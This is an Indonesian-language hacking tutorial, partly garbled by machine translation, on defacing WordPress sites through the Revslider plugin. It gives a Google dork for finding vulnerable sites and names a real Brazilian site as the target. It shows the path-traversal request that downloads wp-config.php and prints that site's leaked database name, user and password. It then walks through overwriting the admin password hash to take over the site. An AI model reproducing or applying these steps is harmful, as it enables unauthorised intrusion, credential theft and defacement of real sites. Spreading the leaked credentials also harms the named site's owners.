Deface Wordpress ( Exploit Revslider ) - Tutorial

Gk Bosan" Bahas Web Exploit :v

Langsung Ajah

Dork - inurl: wp-content / plugins / revslider 

dork ini mengambil semua situs pada platform wordpress dengan nama / wp-content / plugins / revslider 

google dork ... 

kami menemukan target kami, kami akan menguji satu, klik pada pertama, ternyata 

INDEKS / http://www.casaconceitoabc.com.br/si...lugin/videojs/

Sekarang kita akan menggunakan PoC untuk web (Exploit) mengubah awal direktori, sebenarnya Anda akan mengubahnya dari / site karena / wp-content / dimulai di dir lain (Dir berarti direktori)

PoC - wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

akan tetap seperti itu. 

http://www.casaconceitoabc.com.br/site/ ... config.php 

Ini akan men-download satu mysql akses file server atau postgresql 

Anda memeriksa file banyak server yang kemudian localhost tidak perlu bagi Anda mengubah nama konektor daun Server localhost bahkan jika benar dan menempatkan mysql.site.com.br (hanya contoh jika yang lain tidak berhasil. 

akan menjadi kurang begitu setelah u membuka file yang didownload 


// * * pengaturan MySQL - Anda bisa mendapatkan info ini dari web host Anda ** // 
/ ** nama database untuk WordPress * / 
define ( 'DB_NAME', 'casaconc_ws788');

1. [color = # 40FF00] / ** MySQL database username * / 

define ('DB_USER', 'casaconc_ws788'); 

/ ** Kata sandi basis data MySQL * / 
define ('DB_PASSWORD', 'bonS98Pnr1'); 

/ ** Nama host MySQL * / 
define ('DB_HOST', 'localhost'); 

/ ** Database Charset untuk digunakan dalam membuat tabel basis data. * / 
define ('DB_CHARSET', 'utf8'); 

/ ** Jenis Database Collate. Jangan ubah ini jika ragu. * / 
define ('DB_COLLATE', ''); 


Untuk menghubungkan ini dalam database, Anda akan mengunduh Konektor MySQL ini jika Anda memiliki localhost yang dapat Anda gunakan sendiri, tetapi saya lebih suka memuatnya di shell atau pada beberapa host, itu ada bersama Anda. 

Unduh Connector MySQL: https: //www.sendspace.

setelah menghubungkan konektor Anda akan mengubah password Anda di situs MD5 password, yang akan berada di server MySQL tanpa kompensasi yang Base64 atau WordPress MD5 

akan meninggalkan situs di sini untuk Anda membuat kata sandi Anda 

Situs UNTUK PASSWORD MD5: http: / /www.miraclesalad.com/webtools/md5.php


Mari kita berasumsi bahwa password kita adalah: 123carro123 dihasilkan md5 dengan demikian akan menjadi 

password di md5 tampak seperti ini: f05a56649d73768e864b399e51ec77fb 

Anda akan menempatkan dihasilkan sandi di tempat ini sudah dienkripsi: f05a56649d73768e864b399e51ec77fb 

ai Anda mencari panel masuk setelah disimpan pengaturan ini di MySQL, dan log di dengan nama admin dari tabel yang diedit 
 Contoh 

+ ---- + ---- + --------- ------------ +
| Beranda | Kata sandi 
+ ---- + --------- + ---------------- + 
| admin | f05a56649d73768e864b399e51ec77fb | kata sandi Anda untuk menghubungkan bukan ini yang di balik ini dienkripsi yang 123carro123 
| | 
| adriano | NULL | 
+ ---- + --------- + ---------------- + 


Simpan dan pergi ke / wp-admin / site dan masuk dengan kata sandi dibuat dalam tabel database 

Pengguna: admin 
Kata sandi: ***carro***